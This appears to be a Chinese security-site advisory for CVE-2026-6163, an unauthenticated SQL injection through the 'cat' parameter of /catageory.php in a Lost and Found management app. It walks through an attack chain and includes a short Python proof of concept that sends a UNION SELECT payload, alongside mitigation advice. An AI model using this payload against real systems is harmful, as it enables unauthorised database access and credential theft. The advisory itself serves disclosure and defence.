CVE-2026-6163 CVSS 7.3 高危

CVE-2026-6163: Lost and Found Thing Management SQL注入漏洞

披露日期: 2026-04-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6163

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Lost and Found Thing Management

漏洞概述

code-projects Lost and Found Thing Management 1.0版本存在SQL注入漏洞。该漏洞源于/catageory.php文件对用户输入的'cat'参数缺乏有效过滤，直接拼接到SQL查询中。攻击者无需认证即可远程利用此漏洞，通过构造恶意SQL语句操纵数据库，可能导致敏感信息泄露、数据篡改或服务中断。鉴于漏洞利用代码已公开，风险较高。

技术细节

该漏洞位于code-projects Lost and Found Thing Management 1.0的/catageory.php文件中。由于应用程序未对用户输入的'cat'参数进行充分的过滤或转义，直接将其拼接到SQL查询语句中，导致了SQL注入漏洞的产生。攻击者可以通过发送包含恶意SQL代码的HTTP GET或POST请求注入攻击。利用CVSS向量（AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L）可以看出，攻击无需用户交互且无需身份认证即可通过网络发起。攻击者可以利用UNION SELECT查询提取数据库结构、读取管理员密码哈希或其他敏感数据，甚至在某些情况下写入WebShell。目前公开的PoC已证实攻击的可行性，风险等级较高。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标正在使用code-projects Lost and Found Thing Management 1.0系统。

STEP 2

2. 漏洞探测

攻击者访问/catageory.php页面，并在参数'cat'中插入单引号或逻辑测试语句（如' AND 1=1），观察应用响应以判断是否存在SQL注入。

STEP 3

3. 构造攻击载荷

确认漏洞存在后，攻击者构造UNION SELECT语句，试图查询数据库版本、表名及敏感字段（如管理员账号密码）。

STEP 4

4. 数据窃取与利用

通过获取的数据库凭据，攻击者可能登录后台管理系统，进一步上传Webshell或窃取用户数据，导致系统沦陷。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def poc_sqli(target_url):
    """
    Proof of Concept for CVE-2026-6163 SQL Injection
    Target: /catageory.php?cat=...
    """
    # The vulnerable parameter is 'cat'
    injection_payload = "1' UNION SELECT 1,2,3,4,5,6,7,8,9-- -"
    
    full_url = f"{target_url}/catageory.php"
    
    try:
        response = requests.get(full_url, params={'cat': injection_payload}, timeout=10)
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[+] Check if the response reflects database data or errors to confirm vulnerability.")
            print(f"[+] Response length: {len(response.text)}")
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with actual target URL
    target = "http://example.com"
    poc_sqli(target)

影响范围

code-projects Lost and Found Thing Management 1.0

防御指南

临时缓解措施

建议立即停止使用受影响版本或在网络边界限制对该系统的非必要访问。开发人员应立即修复代码，对所有数据库查询接口进行安全审计。在未修复前，可部署Web应用防火墙（WAF）拦截针对'cat'参数的常见SQL注入攻击特征。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6163
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6163
3 Details https://www.cvedetails.com/cve/CVE-2026-6163/
4 VulDB https://vuldb.com/cve/CVE-2026-6163
5 Link https://code-projects.org/
6 Link https://github.com/lanPwa/CVE/issues/2
7 Link https://vuldb.com/submit/797088
8 Link https://vuldb.com/vuln/357051
9 Link https://vuldb.com/vuln/357051/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表